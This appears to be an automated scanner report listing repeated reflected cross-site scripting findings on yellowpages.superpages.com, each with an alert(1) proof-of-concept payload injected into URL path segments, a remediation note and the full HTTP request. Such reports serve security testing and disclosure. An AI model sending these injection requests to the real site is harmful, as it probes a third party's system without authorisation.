The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70fdf"-alert(1)-"1d2656bf970 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/css70fdf"-alert(1)-"1d2656bf970/busprofile.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff00a"-alert(1)-"c09fe80b6a2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/css/busprofile.cssff00a"-alert(1)-"c09fe80b6a2 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 292ea"-alert(1)-"1eaf64826a8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile292ea"-alert(1)-"1eaf64826a8/css/print.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 426cf"-alert(1)-"34b2cd046d7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/css426cf"-alert(1)-"34b2cd046d7/print.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33f48"-alert(1)-"285c1ba1173 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/css/print.css33f48"-alert(1)-"285c1ba1173 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dbad2"-alert(1)-"574d8794b28 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofiledbad2"-alert(1)-"574d8794b28/js/busprofile.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3955f"-alert(1)-"ab711f99641 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/js3955f"-alert(1)-"ab711f99641/busprofile.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f2c3"-alert(1)-"2160ccae2d4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/js/busprofile.js3f2c3"-alert(1)-"2160ccae2d4 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a57f"-alert(1)-"e0ca9e8f165 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile2a57f"-alert(1)-"e0ca9e8f165/js/csiframe.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f2ff"-alert(1)-"0d54626e5e3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/js7f2ff"-alert(1)-"0d54626e5e3/csiframe.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1e00"-alert(1)-"5542952a66f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/js/csiframe.jsc1e00"-alert(1)-"5542952a66f HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2abff"-alert(1)-"60dd3ca3f34 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile2abff"-alert(1)-"60dd3ca3f34/js/hide.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4f3f"-alert(1)-"1ef96819ac8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/jsf4f3f"-alert(1)-"1ef96819ac8/hide.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5dac"-alert(1)-"1b354357d3e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/js/hide.jsa5dac"-alert(1)-"1b354357d3e HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f2a3"-alert(1)-"0fe92af8fd1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile5f2a3"-alert(1)-"0fe92af8fd1/js/photos.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba33c"-alert(1)-"2355df486f6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/jsba33c"-alert(1)-"2355df486f6/photos.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d6f8"-alert(1)-"867529c3b88 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/js/photos.js1d6f8"-alert(1)-"867529c3b88 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 130ee"-alert(1)-"95dec6490a8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile130ee"-alert(1)-"95dec6490a8/script.more.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0941"-alert(1)-"48f962a9221 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/script.more.jse0941"-alert(1)-"48f962a9221 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54d28"-alert(1)-"3d1a28b6a4c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common54d28"-alert(1)-"3d1a28b6a4c/css/forms.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ecf56"-alert(1)-"f7d763f97d4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/cssecf56"-alert(1)-"f7d763f97d4/forms.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e54ec"-alert(1)-"bac5768a8c0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/forms.csse54ec"-alert(1)-"bac5768a8c0 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d82a8"-alert(1)-"cfe7fde9cb4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commond82a8"-alert(1)-"cfe7fde9cb4/css/print.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1e0b"-alert(1)-"fa18ecb5118 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/cssd1e0b"-alert(1)-"fa18ecb5118/print.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9af2"-alert(1)-"c575793e199 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/print.cssf9af2"-alert(1)-"c575793e199 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f422"-alert(1)-"55219820de was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common5f422"-alert(1)-"55219820de/css/reset.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c046"-alert(1)-"de527d85259 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css7c046"-alert(1)-"de527d85259/reset.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 651ba"-alert(1)-"69aaa79ad37 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/reset.css651ba"-alert(1)-"69aaa79ad37 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf12d"-alert(1)-"446e9cd52 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commonbf12d"-alert(1)-"446e9cd52/css/sendtom.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
